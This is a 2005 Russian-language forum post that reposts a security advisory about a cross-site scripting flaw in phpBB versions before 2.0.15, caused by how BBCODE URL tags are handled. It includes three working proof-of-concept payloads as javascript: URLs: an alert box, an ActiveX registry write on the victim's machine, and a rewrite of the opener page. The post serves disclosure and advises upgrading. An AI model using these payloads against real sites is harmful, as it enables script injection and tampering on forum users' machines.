Форум АНТИЧАТ - phpBB < 2.0.15, BBCODE URL в phpBB

phpBB < 2.0.15, BBCODE URL в phpBB

06.06.2005, 22:04

karapuz

Новичок

Регистрация: 06.03.2005

Сообщений: 16

Провел на форуме:
21674

Репутация: 2

phpBB < 2.0.15, BBCODE URL в phpBB

http://www.securitylab.ru/55012.html
http://www.securitylab.ru/55013.html

Межсайтовый скриптинг в при обработке BBCODE URL в phpBB
Программа: phpBB версии до 2.0.15

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

Цитата:

[urЛ=javascript://%0ASh=alert(%22CouCou%22); window.close();]Alert box with "CouCou"[/urЛ]

Цитата:

[urЛ=javascript://%0ASh=new%20ActiveXObject (%22WScript.shell%22);Sh.regwrite(%22HKCU %5C%5CQQQQQ%5C%5Cqq%22,%22CouCou %22);window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/urЛ]

Цитата:

[urЛ=javascript://%0Awindow.opener.document.body. innerHTML=window.opener.document.body.innerHTML. replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27); window.close();]Modify opener page: Paul -> P.A.U.L[/urЛ]

URL производителя: www.phpbb.com

Решение: Установите последнюю версию (2.0.15) с сайта производителя.

Последний раз редактировалось karapuz; 06.06.2005 в 22:07..